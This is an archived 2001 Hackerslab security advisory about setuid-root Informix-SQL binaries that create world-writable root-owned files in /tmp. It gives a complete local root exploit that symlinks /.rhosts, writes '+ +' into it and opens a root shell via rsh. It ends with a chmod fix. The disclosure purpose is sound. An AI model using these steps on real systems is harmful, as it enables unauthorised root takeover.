The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[ Hackerslab bug_paper ] Informix-SQL application vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Tue, 4 Sep 2001 22:18:47 +0900 (KST)
From: [email protected]
To: [email protected]
Subject: [ Hackerslab bug_paper ] Informix-SQL application vulnerability




       [ Hackerslab bug_paper ] Informix-SQL application vulnerability




File   : Informix-SQL application

SYSTEM : Systems running Informix

INFO :

There is a vulneribility in informix-SQL application which allows local
users to create any file with root privilege:

PART 1 :
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5   
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x   1 root     informix 2234104 Nov 18  1999 onbar_d
-rwsr-sr-x   1 root     informix 2219456 Nov 18  1999 ondblog
-rwsr-sr-x   1 root     informix 2284972 Apr 10  2000 onsmsync
-rwsr-sr-x   1 root     informix   39144 Nov 18  1999 onsrvapd

$ ./onbar_d   or ./ondblog  or ./onsmsync
$ ls -al /tmp/bar*
-rw-rw----   1 root     informix     557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw----   1 root     informix       0 Aug 29 17:26 /tmp/bar_dbug.log


PART 2:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw-   1 root     informix     141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw-   1 informix informix     319 Aug 29 17:38 /tmp/onsrvapd.log

PART 3:

$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx   1 root     root        1085 Aug 29 17:43 /tmp/snmpd.log


PART 4:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw-   1 root     informix     141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root


SOLUTION :

remove setuid permition, contact your vendor and get a patch.
$ su -
# cd ~informix/bin  (Informix HOME Directory)
# chmod o-s onbar_d  ondblog  onsmsync  onsrvapd


==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *                                               Kim Yong-Jun
 *      **   **      *                                     [email protected]
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру